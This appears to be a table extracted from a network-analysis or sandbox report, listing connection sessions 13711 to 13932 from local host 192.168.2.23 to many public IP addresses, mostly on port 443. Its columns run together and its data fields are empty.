                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13711192.168.2.2355068193.157.64.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13712192.168.2.2358712181.94.228.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13713192.168.2.233816062.173.136.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13714192.168.2.235536478.185.101.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13715192.168.2.2346712207.238.234.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13716192.168.2.2351482102.250.87.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13717192.168.2.2341154151.160.176.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13718192.168.2.2359698185.221.5.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13719192.168.2.234578483.18.66.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13720192.168.2.2339190125.7.73.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13721192.168.2.2345602210.127.113.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13722192.168.2.233935093.201.50.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13723192.168.2.235284447.130.245.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13724192.168.2.2332972205.58.192.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13725192.168.2.2350576175.225.232.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13726192.168.2.233839045.169.12.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13727192.168.2.2360264138.250.155.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13728192.168.2.2357156136.92.36.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13729192.168.2.2352592109.226.24.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13730192.168.2.233762443.180.98.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13731192.168.2.2352206195.200.180.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13732192.168.2.234423471.62.109.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13733192.168.2.2354228203.157.80.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13734192.168.2.2358844147.24.199.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13735192.168.2.2337462155.17.12.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13736192.168.2.233730053.243.77.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13737192.168.2.235354686.143.18.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13738192.168.2.236068042.141.69.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13739192.168.2.2344122138.241.223.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13740192.168.2.235303298.236.62.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13741192.168.2.2347840179.55.191.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13742192.168.2.2336946172.66.210.888080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13743192.168.2.2357208204.248.116.1948080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13744192.168.2.235945269.46.54.2248080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13745192.168.2.2354626106.98.9.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13746192.168.2.233941840.52.211.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13747192.168.2.23494384.201.33.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13748192.168.2.2336166104.86.89.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13749192.168.2.2336298208.132.85.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13750192.168.2.2334644147.188.36.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13751192.168.2.2356756160.14.47.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13752192.168.2.2341100131.134.86.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13753192.168.2.235781067.88.116.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13754192.168.2.2347710213.177.187.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13755192.168.2.2357968155.47.104.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13756192.168.2.234692247.120.226.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13757192.168.2.2335154223.216.25.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13758192.168.2.2355662153.177.77.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13759192.168.2.2358916162.227.206.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13760192.168.2.2355510143.238.142.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13761192.168.2.2346994128.56.103.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13762192.168.2.2352820180.129.252.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13763192.168.2.2346528184.66.44.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13764192.168.2.2357034207.171.36.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13765192.168.2.234849242.109.227.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13766192.168.2.234540617.17.45.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13767192.168.2.2345090179.145.203.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13768192.168.2.2355684192.46.132.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13769192.168.2.2340506189.19.97.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13770192.168.2.233683868.163.157.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13771192.168.2.2348454188.60.224.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13772192.168.2.2344416171.82.176.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13773192.168.2.23343569.229.226.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13774192.168.2.234635667.28.147.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13775192.168.2.2356268101.139.187.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13776192.168.2.2360262138.29.172.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13777192.168.2.2358060123.178.249.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13778192.168.2.233676896.71.227.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13779192.168.2.234986885.99.35.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13780192.168.2.2356232122.75.137.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13781192.168.2.2346486152.184.214.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13782192.168.2.2352624121.66.142.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13783192.168.2.2352608192.120.240.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13784192.168.2.235727093.57.20.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13785192.168.2.2350744164.210.235.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13786192.168.2.233396676.97.164.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13787192.168.2.2341156222.9.243.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13788192.168.2.234625636.162.134.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13789192.168.2.2348354111.91.177.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13790192.168.2.234167641.130.184.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13791192.168.2.234136634.86.78.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13792192.168.2.2356426126.13.7.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13793192.168.2.23604665.36.225.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13794192.168.2.236034870.231.106.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13795192.168.2.234372288.81.75.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13796192.168.2.235376253.54.143.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13797192.168.2.2340762108.220.201.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13798192.168.2.233797854.188.157.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13799192.168.2.2335866222.162.77.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13800192.168.2.233902032.114.75.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13801192.168.2.236043076.90.161.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13802192.168.2.2354046112.29.233.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13803192.168.2.2359332195.64.174.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13804192.168.2.234934072.242.118.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13805192.168.2.2360726150.136.12.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13806192.168.2.2347792145.30.167.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13807192.168.2.2350008178.160.222.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13808192.168.2.235935884.31.234.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13809192.168.2.2348722154.174.90.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13810192.168.2.233688223.227.228.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13811192.168.2.234085298.176.185.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13812192.168.2.2341354119.220.182.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13813192.168.2.235721497.69.42.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13814192.168.2.23526665.172.87.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13815192.168.2.234423032.36.209.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13816192.168.2.2338996126.85.230.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13817192.168.2.2355464139.53.208.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13818192.168.2.236096225.107.163.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13819192.168.2.235692240.74.40.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13820192.168.2.23540341.128.3.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13821192.168.2.2344792181.219.151.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13822192.168.2.2350840218.81.110.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13823192.168.2.2349428100.152.2.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13824192.168.2.234696272.173.160.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13825192.168.2.234515248.36.202.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13826192.168.2.235422417.226.117.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13827192.168.2.235122481.166.36.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13828192.168.2.2338426133.98.83.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13829192.168.2.235789057.100.19.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13830192.168.2.2340038109.4.138.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13831192.168.2.23433121.2.34.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13832192.168.2.2350838169.43.86.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13833192.168.2.2352600211.175.197.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13834192.168.2.2347162144.153.11.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13835192.168.2.2334526177.67.62.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13836192.168.2.234744023.107.198.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13837192.168.2.2354516166.196.238.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13838192.168.2.233842637.224.131.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13839192.168.2.2353740169.199.14.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13840192.168.2.2335230151.164.178.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13841192.168.2.234272693.205.175.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13842192.168.2.2356482180.154.224.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13843192.168.2.2335014203.241.214.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13844192.168.2.233706686.32.171.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13845192.168.2.234765675.23.69.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13846192.168.2.235076898.192.14.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13847192.168.2.233674073.100.24.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13848192.168.2.2357876147.3.222.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13849192.168.2.234412880.61.138.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13850192.168.2.234691824.142.179.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13851192.168.2.235122899.75.225.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13852192.168.2.234552836.184.229.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13853192.168.2.2359208118.83.11.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13854192.168.2.234665058.9.194.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13855192.168.2.2345064106.89.219.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13856192.168.2.2342054166.117.0.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13857192.168.2.234671044.91.33.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13858192.168.2.2346494194.8.130.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13859192.168.2.235065497.248.62.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13860192.168.2.234000650.149.82.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13861192.168.2.234181066.113.179.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13862192.168.2.2344318162.43.99.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13863192.168.2.23451065.250.100.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13864192.168.2.2336254219.61.108.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13865192.168.2.235004084.19.227.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13866192.168.2.233285850.48.33.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13867192.168.2.234879092.169.50.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13868192.168.2.2333866142.99.164.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13869192.168.2.2334142173.75.17.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13870192.168.2.234860069.79.109.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13871192.168.2.2336538131.156.163.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13872192.168.2.235411223.132.99.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13873192.168.2.2342394140.151.155.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13874192.168.2.234882813.132.168.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13875192.168.2.2343458137.92.49.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13876192.168.2.2341744128.36.93.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13877192.168.2.2336628105.223.53.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13878192.168.2.2352998197.42.183.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13879192.168.2.2354176102.136.128.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13880192.168.2.2348466123.56.254.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13881192.168.2.233448014.189.63.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13882192.168.2.2350288121.184.177.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13883192.168.2.234612491.234.226.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13884192.168.2.2350994185.221.79.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13885192.168.2.2357454155.128.60.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13886192.168.2.236038475.58.98.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13887192.168.2.2337012187.229.41.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13888192.168.2.2353884199.107.70.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13889192.168.2.235401019.221.176.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13890192.168.2.2338858220.96.34.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13891192.168.2.235725435.200.146.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13892192.168.2.236014638.238.130.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13893192.168.2.2336526159.109.103.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13894192.168.2.235411052.31.92.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13895192.168.2.235178465.99.125.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13896192.168.2.234349869.238.15.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13897192.168.2.2352802157.23.109.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13898192.168.2.234874042.37.3.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13899192.168.2.2343530102.160.185.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13900192.168.2.234686241.104.59.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13901192.168.2.235214643.172.143.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13902192.168.2.234850680.163.186.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13903192.168.2.2348122121.224.144.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13904192.168.2.234587293.77.208.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13905192.168.2.2338918180.249.221.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13906192.168.2.2332898191.86.196.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13907192.168.2.2345362204.221.254.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13908192.168.2.234553293.62.85.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13909192.168.2.2351698167.164.221.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13910192.168.2.235160863.193.236.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13911192.168.2.2351300172.84.231.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13912192.168.2.2357076185.98.140.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13913192.168.2.233334617.145.6.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13914192.168.2.2359446217.168.184.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13915192.168.2.2359794123.106.19.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13916192.168.2.2349614221.222.160.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13917192.168.2.2341978159.99.201.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13918192.168.2.2341530177.106.204.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13919192.168.2.2358458201.87.197.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13920192.168.2.234149275.117.110.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13921192.168.2.2336474131.234.122.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13922192.168.2.234749442.149.95.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13923192.168.2.23583545.232.0.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13924192.168.2.233939048.211.120.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13925192.168.2.2333008185.21.191.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13926192.168.2.2334332169.57.46.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13927192.168.2.234129278.219.225.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13928192.168.2.23432822.101.195.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13929192.168.2.2356604193.33.117.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13930192.168.2.235640427.102.174.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13931192.168.2.2357598156.117.190.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13932192.168.2.2338750148.146.31.61443
